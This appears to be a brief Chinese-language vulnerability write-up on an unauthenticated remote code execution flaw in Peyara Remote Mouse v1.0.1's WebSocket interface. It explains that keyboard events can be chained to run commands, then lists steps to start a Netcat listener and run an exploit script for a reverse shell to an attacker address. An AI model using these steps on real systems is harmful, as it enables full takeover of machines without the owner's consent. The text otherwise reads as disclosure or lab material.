Peyara Remote Mouse v1.0.1 的 WebSocket 命令接口(端口 1313)存在一个未经验证的远程代码执行漏洞。该应用程序未能验证或清理通过 WebSocket 连接接收到的模拟键盘输入命令,攻击者可利用这一点串联恶意键盘事件,从而执行任意系统命令。攻击者可在无需身份验证的情况下远程利用此漏洞,实现对整个系统的完全入侵。
安装存在漏洞的应用程序
在目标 Windows 系统上下载并安装 Peyara Remote Mouse。
启动 Netcat 监听器
打开终端并执行:
nc -nlvp 4444
执行漏洞利用脚本
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

